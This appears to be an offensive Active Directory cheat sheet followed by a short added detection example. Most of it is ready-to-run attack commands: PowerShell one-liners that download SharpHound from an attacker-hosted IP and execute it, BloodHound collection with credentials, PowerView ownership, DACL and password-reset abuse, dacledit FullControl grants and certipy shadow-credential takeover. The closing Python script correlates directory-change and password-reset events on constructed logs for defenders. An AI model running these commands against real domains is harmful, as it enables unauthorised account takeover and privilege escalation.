Bloodhound

SharpHound

IEX(New-Object Net.WebClient).downloadFile('http://10.10.14.10/SharpHound.exe', 'SharpHound.exe')
.\SharpHound.exe --CollectionMethods All

IWR -Uri http://10.10.14.10/SharpHound.exe -OutFile SharpHound.exe
.\SharpHound.exe -c All --zipfilename QU35T

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All

Bloodhound.py

bloodhound.py --zip -c All -d qu35t.pw -u 'qu35t' -p 'Password1!' -ns 172.17.0.3

ACL Abuse
| Object | Abused with |
| --- | --- |
| ForceChangePassword | Set-DomainUserPassword |
| Add Members | Add-DomainGroupMember |
| GenericAll | Set-DomainUserPassword / Add-DomainGroupMember |
| GenericWrite | Set-DomainObject |
| WriteOwner | Set-DomainObjectOwner |
| WriteDACL | Add-DomainObjectACL |
| AllExtendedRights | Set-DomainUserPassword / Add-DomainGroupMember |
| Addself | Add-DomainGroupMember |

Via Windows :
net group backups qu35t /add

Set-DomainObjectOwner -identity jeff -OwnerIdentity qu35t
Add-DomainObjectAcl -TargetIdentity jeff -PrincipalIdentity qu35t -Rights ResetPassword
$cred = ConvertTo-SecureString 'Passw0rd!' -AsPlainText -force
Set-DomainUserPassword -identity jeff -accountpassword $cred

getTGT.py qu35t.pw/qu35t
KRB5CCNAME=qu35t.ccache dacledit.py -k -no-pass -dc-ip 10.10.10.10 -principal qu35t -target "Network Audit" -action write -rights FullControl qu35t.pw/qu35t
net rpc group addmem "Network Audit" -k -U qu35t -S qu35t.pw qu35t

KRB5CCNAME=qu35t.ccache certipy shadow auto -k -no-pass -u qu35t.pw/[email protected] -dc-ip 10.10.10.10 -target dc.qu35t.pw --account yakei
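
On the monitoring side, the owner/DACL rewrite followed by a password reset or group add, as in the sequences above, shows up on the domain controller as a 5136 write to nTSecurityDescriptor followed shortly by a 4724 or 4728/4732/4756 event from the same account. The correlation below is an added example, not part of the original page. The events are constructed samples with hypothetical field names; it assumes Directory Service Changes auditing is enabled and that the DN's first RDN equals the account or group name.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Keys are hypothetical normalised names.
# 5136 = directory object modified, 4724 = password reset attempt,
# 4728 = member added to a security-enabled global group.
EVENTS = [
    {"time": "2024-01-10T09:00:05", "id": 5136, "actor": "qu35t",
     "object_dn": "CN=jeff,CN=Users,DC=qu35t,DC=pw", "attribute": "nTSecurityDescriptor"},
    {"time": "2024-01-10T09:00:40", "id": 4724, "actor": "qu35t", "target": "jeff"},
    {"time": "2024-01-10T09:30:00", "id": 4724, "actor": "helpdesk", "target": "bob"},
    {"time": "2024-01-10T10:00:00", "id": 5136, "actor": "qu35t",
     "object_dn": "CN=Network Audit,CN=Users,DC=qu35t,DC=pw", "attribute": "nTSecurityDescriptor"},
    {"time": "2024-01-10T10:01:10", "id": 4728, "actor": "qu35t",
     "target": "Network Audit", "member": "CN=qu35t,CN=Users,DC=qu35t,DC=pw"},
    {"time": "2024-01-10T11:00:00", "id": 5136, "actor": "admin",
     "object_dn": "CN=bob,CN=Users,DC=qu35t,DC=pw", "attribute": "description"},
]

# Events that exercise a right on the object whose descriptor was just changed.
FOLLOW_UPS = {4724: "password reset", 4728: "group member added",
              4732: "group member added", 4756: "group member added"}


def first_rdn(dn):
    """Leftmost RDN value, lowercased (assumes no escaped commas in that RDN)."""
    return dn.split(",", 1)[0].split("=", 1)[1].strip().lower()


def find_acl_then_use(events, window=timedelta(minutes=15)):
    """Flag an actor who rewrites an object's security descriptor and then,
    within `window`, resets that account's password or adds a member to that group."""
    findings = []
    recent = {}  # (actor, object name) -> time of last nTSecurityDescriptor write
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        actor = ev["actor"].lower()
        if ev["id"] == 5136 and ev.get("attribute", "").lower() == "ntsecuritydescriptor":
            recent[(actor, first_rdn(ev["object_dn"]))] = when
        elif ev["id"] in FOLLOW_UPS:
            changed = recent.get((actor, ev["target"].lower()))
            if changed is not None and when - changed <= window:
                findings.append((actor, ev["target"], FOLLOW_UPS[ev["id"]],
                                 int((when - changed).total_seconds())))
    return findings


if __name__ == "__main__":
    for actor, target, action, delay in find_acl_then_use(EVENTS):
        print(f"{actor} changed the ACL/owner of {target!r}, then {action} {delay}s later")
```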